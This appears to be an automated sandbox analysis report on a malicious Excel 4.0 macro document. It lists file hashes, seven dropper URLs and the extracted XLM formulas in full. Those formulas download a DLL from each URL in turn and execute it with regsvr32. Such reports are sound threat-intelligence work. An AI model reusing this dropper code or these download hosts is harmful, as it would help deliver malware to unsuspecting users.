General

  • Target

    9e940cff8c32a5b77aff650974d5ea74e5a9b5001ee8bbbd53f5a6201782759e

  • Size

    29KB

  • Sample

    241111-wxm1jsslex

  • MD5

    e8fa2d22a2b5212d6f9f95cc2997a305

  • SHA1

    351dd4d60dc0be89a5d39a79b94aa7958fcadcce

  • SHA256

    9e940cff8c32a5b77aff650974d5ea74e5a9b5001ee8bbbd53f5a6201782759e

  • SHA512

    b411085384f9ed60890052364ffa177e0c62307b77f1540026bd6ff8e6587bcc024593bd05a30cc852b7070d3cac993b237e561eef3b39ee27e669decabd4909

  • SSDEEP

    384:tvANFOv+7UaivQ2BNZJibbwBUA6+h4wyqJeAqcctU1jrYsu8HP7jFFtCvI:1qUtVNZAXby9y+cccS1AsuIjxl

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://iqraacfindia.org/wp-admin/dG/

https://he.adar-and-ido.com/wp-admin/xk7D/

https://www.digigoal.fr/wp-admin/VfU0aIj/

https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/

https://al-brik.com/vb/mMQlbHPCX/

https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/

https://biantarajaya.com/awstats-icon/VR5wDEvBj/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://iqraacfindia.org/wp-admin/dG/","..\whxc.dll",0,0) =IF('IJEGVS'!H16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://he.adar-and-ido.com/wp-admin/xk7D/","..\whxc.dll",0,0)) =IF('IJEGVS'!H18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.digigoal.fr/wp-admin/VfU0aIj/","..\whxc.dll",0,0)) =IF('IJEGVS'!H20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/","..\whxc.dll",0,0)) =IF('IJEGVS'!H22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://al-brik.com/vb/mMQlbHPCX/","..\whxc.dll",0,0)) =IF('IJEGVS'!H24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/","..\whxc.dll",0,0)) =IF('IJEGVS'!H26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://biantarajaya.com/awstats-icon/VR5wDEvBj/","..\whxc.dll",0,0)) =IF('IJEGVS'!H28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\whxc.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://iqraacfindia.org/wp-admin/dG/

xlm40.dropper

https://he.adar-and-ido.com/wp-admin/xk7D/

xlm40.dropper

https://www.digigoal.fr/wp-admin/VfU0aIj/

xlm40.dropper

https://carzino.atwebpages.com/assets/QwlhxhsYfkYntLW0haX/

xlm40.dropper

https://al-brik.com/vb/mMQlbHPCX/

xlm40.dropper

https://apexcreative.co.kr/adm/VdiKTcljSBORQRrsh66X/

xlm40.dropper

https://biantarajaya.com/awstats-icon/VR5wDEvBj/

Targets

    • Target

      9e940cff8c32a5b77aff650974d5ea74e5a9b5001ee8bbbd53f5a6201782759e

    • Size

      29KB

    • MD5

      e8fa2d22a2b5212d6f9f95cc2997a305

    • SHA1

      351dd4d60dc0be89a5d39a79b94aa7958fcadcce

    • SHA256

      9e940cff8c32a5b77aff650974d5ea74e5a9b5001ee8bbbd53f5a6201782759e

    • SHA512

      b411085384f9ed60890052364ffa177e0c62307b77f1540026bd6ff8e6587bcc024593bd05a30cc852b7070d3cac993b237e561eef3b39ee27e669decabd4909

    • SSDEEP

      384:tvANFOv+7UaivQ2BNZJibbwBUA6+h4wyqJeAqcctU1jrYsu8HP7jFFtCvI:1qUtVNZAXby9y+cccS1AsuIjxl

    Score
    10/10

MITRE ATT&CK Enterprise v15

Tasks